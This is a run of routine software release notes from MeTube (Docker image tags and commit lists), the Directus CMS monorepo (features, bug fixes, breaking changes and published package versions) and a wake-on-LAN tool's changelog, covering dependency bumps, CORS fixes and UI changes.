• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.04.16

Changes

• upgrade dependencies (ab42325)
• fix PUBLIC_HOST_URL without a trailing slash (closes #959) (1a32eba)
• don't run workflow on README changes (29ccc42)
• add more CORS details (f2d71cb)

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.04.13

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.04.13

Changes

• fix asterisk CORS_ALLOWED_ORIGINS, mentioned in #955 (03f71fd)

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.04.12

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.04.12

Changes

• fix pnpm build (210c607)
• Bump softprops/action-gh-release from 2 to 3 in the github-actions group (3818969)
• fix yt-dlp options examples (4330d3b)
• update documentation (06c4a2c)

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.04.10

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.04.10

Changes

• document CORS_ALLOWED_ORIGINS variable (aa60420)
• Don't mark live streams as seen (a6e8617)
• Fix permissive CORS policy that allows cross-origin attacks (0072d34)

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.04.09

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.04.09

Changes

• upgrade dependencies (0b3645a)
• fix: handle playlists that don't supply video ids (d38d7bd)
• Bump astral-sh/setup-uv from 6 to 7 in the github-actions group (b7709d3)

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.04.05

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.04.05

Changes

• fix: parse string boolean values when updating subscriptions (373692a)
• explain yt-dlp configuration in detail (54680c4)

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.04.04

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.04.04

Changes

• change option presets to be multi-select (dd0f98d)

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.04.03

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.04.03

Changes

• finalize custom options (closes #563, #482, #261, #681) (d41bdf6)
• Keep override controls on dedicated row (a02abf5)
• Fix frontend test typing for override flag (b16e597)
• Gate manual yt-dlp overrides behind flag (6e9b2dd)
• feat: add per-download yt-dlp presets and overrides (565a715)

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.04.02

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.04.02

Changes

• update README (0cba61c)
• Add clarifying comments for n_entries and __last_playlist_index fields (closes #692) (d7eaaaa)
• Use PORT env variable in Dockerfile HEALTHCHECK instead of hardcoded 8081 (771ba52)
• Initial plan (1cc27d3)
• Propagate missing playlist context fields (playlist_count, playlist_autonumber, n_entries, __last_playlist_index) (981e6c1)
• Add explanatory comment for fake STR_FORMAT_RE_TMPL key group in tests (b17e1e5)
• Replace custom template substitution with yt-dlp's evaluate_outtmpl (c1b5540)

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.04.01

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.04.01

Changes

• add subscriptions; change persistence file format to JSON (closes #901, #76, #113, #170, #242, #444, #503, #555, #566) (483575d)

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.03.21

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.03.21

Changes

• fix pickle (closes #814) (84c6418)

✨ New Features & Improvements

• @directus/app
  • Replaced "All Users" tab with Active, Suspended, and Invited status tabs (#27036 by @robluton)
  • Added Save as New File option to image editor (#27084 by @JamesW1)
• @directus/api
  • Added a new /ai/object endpoint to generate structured objects for autocomplete and other inline experiences (#26862 by @bryantgillespie)
• @directus/composables
  • Eliminated redundant count requests in the useItems composable (#26906 by @okxint)

🐛 Bug Fixes & Optimizations

• @directus/app
  • Fixed export failing on collections with virtual fields like $thumbnail by excluding them from export defaults and the field picker (#27073 by @om-singh-D)
  • Added customizing of cache keys for flow endpoints. (#26935 by @costajohnt)
  • Fix "Use named routes instead of hardcoded path strings #26733" (#26809 by @powerseed)
  • Fixed VBadge intercepting pointer events on slotted elements (#27087 by @HZooly)
  • Fixed comparison modal footer responsive breakpoint (#27061 by @robluton)
  • Updated liquidjs, axios, vite, nodemailer, brace-expansion, basic-ftp, hono, fast-xml-parser, tar, (#27081 by @br41nslug)
    qs and defu dependencies
• @directus/api
  • Added customizing of cache keys for flow endpoints. (#26935 by @costajohnt)
  • Updated liquidjs, axios, vite, nodemailer, brace-expansion, basic-ftp, hono, fast-xml-parser, tar, (#27081 by @br41nslug)
    qs and defu dependencies
  • Fixed schema introspection for MSSQL text fields with max length of -1 to be normalized to null (#26934 by @begsaquib)
  • Trimmed leading and trailing spaces from search queries (#27089 by @robluton)
  • Fixed promotion of deleted relation returning invalid date time value error (#27040 by @gaetansenn)
  • Fixed api building with a node_modules folder (#27067 by @Nitwel)
  • Fixed MARKETPLACE_REGISTRY env not being passed to registry list call when generating extension settings (#27076 by @gaetansenn)
  • Replaced INTERNAL_SERVER_ERROR with SERVICE_UNAVAILABLE for marketplace registry errors and improved error messages. (#26937 by @eric-pennecot)
• @directus/schema
  • Fixed schema introspection for MSSQL text fields with max length of -1 to be normalized to null (#26934 by @begsaquib)
• @directus/themes
  • Fixed api building with a node_modules folder (#27067 by @Nitwel)
• @directus/types
  • Fixed api building with a node_modules folder (#27067 by @Nitwel)

📦 Published Versions

• @directus/app@15.9.0
• @directus/api@35.1.0
• @directus/composables@11.4.0
• create-directus-extension@11.0.35
• @directus/extensions@3.0.24
• @directus/extensions-registry@3.0.25
• @directus/extensions-sdk@17.1.3
• @directus/schema@13.0.8
• @directus/schema-builder@0.0.19
• @directus/themes@1.3.2
• @directus/types@15.0.2

✨ New Features & Improvements

• @directus/app
  • Moved useShortcut and translateShortcut in @directus/composables (#26979 by @HZooly)
  • added timezone support to datetime display (#26184 by @u12206050)
  • Added comparison modal checkbox to allow viewing only modified fields (#27010 by @robluton)
• @directus/composables
  • Moved useShortcut and translateShortcut in @directus/composables (#26979 by @HZooly)

🐛 Bug Fixes & Optimizations

• @directus/app
  • Fixed alias fields being included when selecting all fields in export (#26775 by @tysoncung)
  • Fixed invite acceptance error to display correctly on the frontend and allow for error translation (#26971 by @faizkhairi)
  • Fixed relational field removals inside groups not persisting on draft items (#26917 by @HZooly)
  • Fixed search input not closing when focus changes on keyboard navigation (#26970 by @Zhey-on)
• @directus/api
  • Fixed invite acceptance error to display correctly on the frontend and allow for error translation (#26971 by @faizkhairi)
  • Updated lodash, samlify and @xmldom/xmldom dependencies and add defu override (#27033 by @br41nslug)
  • Fixed coercion of stringified JSON in AI assistant tool arguments (#27005 by @bryantgillespie)
  • Added cleanup handlers for disconnected file streams (#26992 by @Champ-Goblem)
• @directus/errors
  • Fixed invite acceptance error to display correctly on the frontend and allow for error translation (#26971 by @faizkhairi)

📦 Published Versions

• @directus/app@15.8.0
• @directus/api@35.0.2
• @directus/composables@11.3.0
• create-directus-extension@11.0.34
• @directus/errors@2.3.1
• @directus/extensions-registry@3.0.24
• @directus/extensions-sdk@17.1.2
• @directus/memory@3.1.7
• @directus/validation@2.0.22

Changelog

Bug fixes

• 95d722b: fix: test udp (@seriousm4x)

Others

• 6caddf2: Update README.md - reorganized parts and linked to Wiki instead (#1719) (@invario)
• f7dc0b2: Update docker-compose.yml (#1721) (@invario)
• 8d461e0: add note for DEVICE_IP and DEVICE_MAC availability in cmds (#1716) (@invario)
• 314d338: build(deps): bump golang.org/x/image from 0.37.0 to 0.38.0 in /backend (@dependabot[bot])
• d8bdab2: build(deps): bump yaml from 1.10.2 to 1.10.3 in /frontend (@dependabot[bot])
• 6d53e9e: fix(cron/wake): fix closure bugs, add reload hooks, and improve command robustness (#1723) (@monstercjz)
• 49d4109: gh-actions: remove go and npm, will update manually (@seriousm4x)
• 59b1723: send additional 2 magic packets via IP address for routed WOL (#1718) (@invario)
• 65d6e9f: update deps (@seriousm4x)

✨ New Features & Improvements

• @directus/app
  • Added keyboard navigation to the cards layout (#26976 by @HZooly)
  • Added native Tabs group interface. Uninstall the extension if currently using it to avoid unintended side effects. (#26836 by @bryantgillespie)
  • Added bulk folder deletion from the files grid with move-up or delete-all options (#26886 by @HZooly)
  • Used shorter tooltip delay for disabled elements (#26965 by @HZooly)
• @directus/utils
  • Added parseNow utility to resolve the $NOW dynamic variable (#26954 by @costajohnt)

🐛 Bug Fixes & Optimizations

• @directus/app
  • Fixed calendar picker crash when using dynamic variables (e.g. $NOW) (#26954 by @costajohnt)
  • Updated relationship_not_setup wording to clarify it may also result from missing permissions (#26918 by @Ikromjon1998)
  • Restored useItem support for custom query options like fields and deep by adding an optional extra query parameter and updating affected call sites. (#26985 by @LZylstra)
• @directus/api
  • Fixed file replacement returning Forbidden (#27001 by @ComfortablyCoding)
  • Updated happy-dom, path-to-regexp, picomatch, node-forge, and brace-expansion to address CVEs (#27006 by @br41nslug)
  • Fixed extension auto reload not triggering (#26986 by @ComfortablyCoding)
• @directus/utils
  • Fixed calendar picker crash when using dynamic variables (e.g. $NOW) (#26954 by @costajohnt)
• @directus/schema
  • Fixed MySQL foreignKeys query to include TABLE_NAME in the JOIN condition, preventing a cartesian product when InnoDB statistics on system tables are degraded. (#26964 by @HattoriEnzo)
• @directus/sdk
  • Fixed filter operator typing for date and time fields to support comparison and range operators. (#26957 by @costajohnt)

📦 Published Versions

• @directus/app@15.7.0
• @directus/api@35.0.1
• @directus/composables@11.2.17
• create-directus-extension@11.0.33
• @directus/env@5.7.1
• @directus/extensions@3.0.23
• @directus/extensions-registry@3.0.23
• @directus/extensions-sdk@17.1.1
• @directus/memory@3.1.6
• @directus/pressure@3.0.21
• @directus/schema@13.0.7
• @directus/schema-builder@0.0.18
• @directus/storage-driver-azure@12.0.21
• @directus/storage-driver-cloudinary@12.0.21
• @directus/storage-driver-gcs@12.0.21
• @directus/storage-driver-s3@12.1.7
• @directus/storage-driver-supabase@3.0.21
• @directus/themes@1.3.1
• @directus/types@15.0.1
• @directus/utils@13.4.0
• @directus/validation@2.0.21
• @directus/sdk@21.2.2

⚠️ Potential Breaking Changes

Added support for importing data in the background (#26914)
Imports now automatically time out after 1 hour, with a maximum of 20 running concurrently. These limits can be configured via IMPORT_TIMEOUT and IMPORT_MAX_CONCURRENCY, respectively.

Improved build times using tsdown’s oxc-transform (#26604)
Exports previously available from @directus/types/collab are now exported directly from @directus/types

Shrunk app UI to 90% and converted all px to rem (16px browser default) (#26826)
Potential breaking change: The app UI has been shrunk to 90% of its previous size. Extensions that rely on hardcoded px values or the old 14px root font-size may render incorrectly — all app sizing now uses rem based on the 16px browser default.

• @directus/api
  • Added support for importing data in the background (#26914 by @Nitwel)
• @directus/types
  • Improved build times using tsdown’s oxc-transform (#26604 by @Nitwel)
• @directus/specs
  • Updated fast-xml-parser, qs, minimatch, tar, undici, vue-split-panel and flatted dependencies (#26951 by @br41nslug)

✨ New Features & Improvements

• @directus/app
  • Added support for importing data in the background (#26914 by @Nitwel)
  • Added utility endpoint and UI to generate translations collections and fields. (#26742 by @bryantgillespie)
  • Added deployment provider link on the run detail page, opening deployments directly in Vercel or Netlify dashboards. (#26888 by @LZylstra)
  • Shrunk app UI to 90% and converted all px to rem (16px browser default) (#26826 by @formfcw)
• @directus/api
  • Added tool search tool for Anthropic AI provider to reduce context usage (#26864 by @bryantgillespie)
  • Added support for setting the secure attribute on OpenID/OAuth2 cookies via the AUTH_<PROVIDER>_COOKIE_SECURE environment variable (#26628 by @dstockton)
  • Updated FilesService.uploadOne to support an optional storage parameter (#26882 by @gaetansenn)
  • Added AI SDK Devtools middleware support for debugging AI Assistant in development only. Added AI telemetry provider (#26678 by @bryantgillespie)
    config for Braintrust and Langfuse, enabling sending traces for observability, usage, and token costs.
  • Added utility endpoint and UI to generate translations collections and fields. (#26742 by @bryantgillespie)
  • Added support for Redis namespace control (#26943 by @dstockton)
• @directus/errors
  • Added support for importing data in the background (#26914 by @Nitwel)
• @directus/env
  • Added support for importing data in the background (#26914 by @Nitwel)
  • Added support for Redis namespace control (#26943 by @dstockton)
• @directus/system-data
  • Added utility endpoint and UI to generate translations collections and fields. (#26742 by @bryantgillespie)
• @directus/constants
  • Added utility endpoint and UI to generate translations collections and fields. (#26742 by @bryantgillespie)
• @directus/extensions-sdk
  • Shrunk app UI to 90% and converted all px to rem (16px browser default) (#26826 by @formfcw)
• @directus/themes
  • Shrunk app UI to 90% and converted all px to rem (16px browser default) (#26826 by @formfcw)

🐛 Bug Fixes & Optimizations

• @directus/app
  • Fix file renaming (#26946 by @br41nslug)
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
  • Fixed filtering out preRegisterCheck === false modules from settings module bar config (#26953 by @AlexGaillard)
  • Prevented uncaught exception when v-menu has no tabbable elements (#26922 by @robluton)
  • Fixed a bug where global draft updates failed for singleton collections (#26910 by @formfcw)
  • Refactored "Clear value(s) on save when hidden" condition so it's applied inside a drawer (#26925 by @AlexGaillard)
  • Added functionality to duplicate access policies (#26889 by @robluton)
  • Reduced width of split panel resize handle to prevent scrollbar interference (#26908 by @robluton)
  • Updated Vite to version 8.0.0 (#26887 by @Nitwel)
  • Corrected field editability for conditional update policies and version items (#26815 by @HZooly)
  • Fixed date picker not emitting value after month/year change. (#26880 by @powerseed)
  • Fixed inconsistent dropdown arrows in visual editor header bar (#26904 by @formfcw)
• @directus/api
  • Added API request counting to telemetry reports. Requests are tracked by HTTP method and cache status. (#26738 by @connorwinston)
  • Fix file renaming (#26946 by @br41nslug)
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
  • Fixed errors during import not propagated while the file is streaming (#26881 by @Nitwel)
  • Added cache clear CLI command with --system and --data flags (#26898 by @gaetansenn)
  • Improved build times using tsdown’s oxc-transform (#26604 by @Nitwel)
  • Preserved M2A type info when using named GraphQL fragments (#26920 by @gaetansenn)
  • Added GraphQL resolver deduplication (#26949 by @br41nslug)
  • Fixed aggregation sanitization (#26948 by @br41nslug)
  • Added cross origin opener policy settings (#26947 by @br41nslug)
  • Fixed revisions not using prepareDelta (#26867 by @br41nslug)
• @directus/types
  • Fix file renaming (#26946 by @br41nslug)
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
  • Updated FilesService.uploadOne to support an optional storage parameter (#26882 by @gaetansenn)
  • Added GraphQL resolver deduplication (#26949 by @br41nslug)
  • Fixed revisions not using prepareDelta (#26867 by @br41nslug)
• @directus/env
  • Fix file renaming (#26946 by @br41nslug)
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
  • Added support for setting the secure attribute on OpenID/OAuth2 cookies via the AUTH_<PROVIDER>_COOKIE_SECURE environment variable (#26628 by @dstockton)
  • Added AI SDK Devtools middleware support for debugging AI Assistant in development only. Added AI telemetry provider (#26678 by @bryantgillespie)
    config for Braintrust and Langfuse, enabling sending traces for observability, usage, and token costs.
  • Added cross origin opener policy settings (#26947 by @br41nslug)
• @directus/ai
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/composables
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/constants
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/errors
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/extensions
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/extensions-registry
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/extensions-sdk
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
  • Updated Vite to version 8.0.0 (#26887 by @Nitwel)
• @directus/format-title
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/memory
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/pressure
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/release-notes-generator
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
  • Fixed generated build (#26959 by @AlexGaillard)
• @directus/schema
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/schema-builder
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/storage
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/storage-driver-azure
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/storage-driver-cloudinary
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/storage-driver-gcs
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/storage-driver-local
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/storage-driver-s3
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/storage-driver-supabase
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/stores
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/system-data
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/themes
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/update-check
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/utils
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
  • Preserved M2A type info when using named GraphQL fragments (#26920 by @gaetansenn)
  • Fixed revisions not using prepareDelta (#26867 by @br41nslug)
• @directus/validation
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
• @directus/sdk
  • Updated @directus/tsconfig dependency from 3.0.0 to 4.0.0 (#26879 by @AlexGaillard)
  • Improved build times using tsdown’s oxc-transform (#26604 by @Nitwel)
  • Fixed function typing in sdk for date and time fields. (#26936 by @costajohnt)

📦 Published Versions

• @directus/app@15.6.0
• @directus/api@35.0.0
• @directus/ai@1.3.1
• @directus/composables@11.2.16
• @directus/constants@14.3.0
• create-directus-extension@11.0.32
• @directus/env@5.7.0
• @directus/errors@2.3.0
• @directus/extensions@3.0.22
• @directus/extensions-registry@3.0.22
• @directus/extensions-sdk@17.1.0
• @directus/format-title@12.1.2
• @directus/memory@3.1.5
• @directus/pressure@3.0.20
• @directus/release-notes-generator@2.0.4
• @directus/schema@13.0.6
• @directus/schema-builder@0.0.17
• @directus/specs@13.0.0
• @directus/storage@12.0.4
• @directus/storage-driver-azure@12.0.20
• @directus/storage-driver-cloudinary@12.0.20
• @directus/storage-driver-gcs@12.0.20
• @directus/storage-driver-local@12.0.4
• @directus/storage-driver-s3@12.1.6
• @directus/storage-driver-supabase@3.0.20
• @directus/stores@2.0.1
• @directus/system-data@4.4.0
• @directus/themes@1.3.0
• @directus/types@15.0.0
• @directus/update-check@13.0.5
• @directus/utils@13.3.2
• @directus/validation@2.0.20
• @directus/sdk@21.2.1

Changelog

Bug fixes

• 95d722b: fix: test udp (@seriousm4x)

Others

• 8d461e0: add note for DEVICE_IP and DEVICE_MAC availability in cmds (#1716) (@invario)
• 49d4109: gh-actions: remove go and npm, will update manually (@seriousm4x)
• 59b1723: send additional 2 magic packets via IP address for routed WOL (#1718) (@invario)

Changelog

Bug fixes

• 105ae4f: fix: static page reload fails, use search param device id, close #1711 (@seriousm4x)

Others

• b00f3a1: fix build (@seriousm4x)
• 4610b54: pnpm update (@seriousm4x)

Npm dependencies

• 4c03494: npm-dep: bump @inlang/paraglide-js from 2.15.0 to 2.15.1 in /frontend (@dependabot[bot])